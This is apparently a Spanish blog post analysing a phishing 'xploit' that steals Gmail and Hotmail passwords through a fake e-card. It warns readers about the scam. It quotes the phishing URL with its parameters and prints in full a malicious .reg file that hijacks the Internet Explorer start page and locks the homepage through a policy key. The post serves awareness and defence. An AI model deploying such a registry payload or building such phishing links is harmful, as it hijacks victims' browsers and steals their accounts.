Rastreo a Xploits de Gmail
Hacia muchisimos años no veia estas ridiculeses, de nuevo los dichosos xploits para robar contraseñas de correos han vuelto, como cosa rara este del gusanito, común, típico y fácil de reconocer, a llegado a mi correo y he decido investigarlo a fondo.
Lo primer que hice fue darle click a la "postal" para ver en que servidor se encontraba hospedado el script, la falsificación es casi perfecta, como siempre sucede, nos pediran que ingresemos la contraseña de nuestra cuenta para poder verla:
http://emilyhot.com/by107fd.bay107.hotmail.msn.com.cgibin.hotmail.curmbox.000010000.2d0000.
2d0000.2d00002d000000000001000000000000000000000000012777885554444200passport
//logearse.php?fake=amistad&nombre=xxxxxx&correo=xxxxxxx@gmail.com&retorno=xxxxxx@gmail.com
&Postal= &nombre_from=xxxxxx&correo_from=xxxxxx@hotmail.com&mensaje=solo+para+ti
Me doy cuenta de varias cosas:
- hospedada en http://emilyhot.com
- logearse.php?fake ----> Les dice algo la palabra fake?
- retorno=xxxxxx@gmail.com
- from=xxxxxx@gmail.com
Osea, mas fácil de ver imposible...
Así luce nuestro inicio de sesion:
Y así el código del formulario:
Por acá termina el fake del xploit, ahora veamos el fake de la página, como habia mencionado anteriormente, el xploit se encuentra hospedado en http://emilyhot.com/, para muchos la página luce muy bien, la niña es hermosa y pues nada raro; pues como siempre no todo lo que brilla es oro, y que te ofrezcan acceso gratis es casi imposible:
¿Por qué imposible?, fácil, porque esta página es solo un fake del site original de Emily18, que es este: http://www.emily18.com/, que como podrán verificar el acceso gratis no aparece por ningun lado, y lo peor, el dichoso fake esta hecho con frontpage:
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
Siguiendo con el fake y dirigiendome clickeo en "acceso gratis" me encuentro con las dichosas intrucciones:
Donde nos piden que nos descarguemos el siguiente archivo Zona-Fullsex.reg, supuestamente este archivito es para poder tener identificado tu pc frente te a su poderosa zona erótica, FALSO, que tiene el archivito:
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.espiamsn.com"
"Window Title"="EspiaMSN.Com - Revelador de contraseñas Hotmail, Yahoo, Gmail, Aol - Mail Hack - Ingenieria avanzada para correos - Captor de Claves - Bloqueador de Hotmail - Localizador de Ciudad - Ultra espionaje avanzado - Navegacion anónima - Hackear MSN - Hack Messenger - hackear Hotmail - Hack Hotmail - Hackear Yahoo - Hack Yahoo - Hackear Aol - Hack Aol - Espias Satelitales"
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\control panel]
"HomePage"=dword:00000001
No creo que necesitemos nuestra contraseña del correo para poder acceder al sitio de nuestra hermosa amiguita Emily.
Que es EspiaMSN:
Bienvenidos al descifrador de contraseñas INTERNACIONAL, el mas importante para la obtención de contraseñas, mediante programas espías, ingeniería avanzada, descifradores y recuperadores de contraseñas (Contraseñas DE HOTMAIL-YAHOO-GMAIL-AOL) y cualquier correo que usted desee espiar. No se deje engañar por programas de descarga gratuita en paginas de hacker, que vienen habitualmente con virus guardados
Así que de una vez les advierto, MUCHO OJO CON ESTO, ES GENTE INESCRUPULOSA INTENTA ROBAR VUESTRAS CUENTAS DE CORREO, COMO DIJE ANTERIORMENTE NO TODO LO QUE BRILLA ES ORO.
Si conocen otro xploit agradezco me envien una copia para ver su origen.
Loading ...
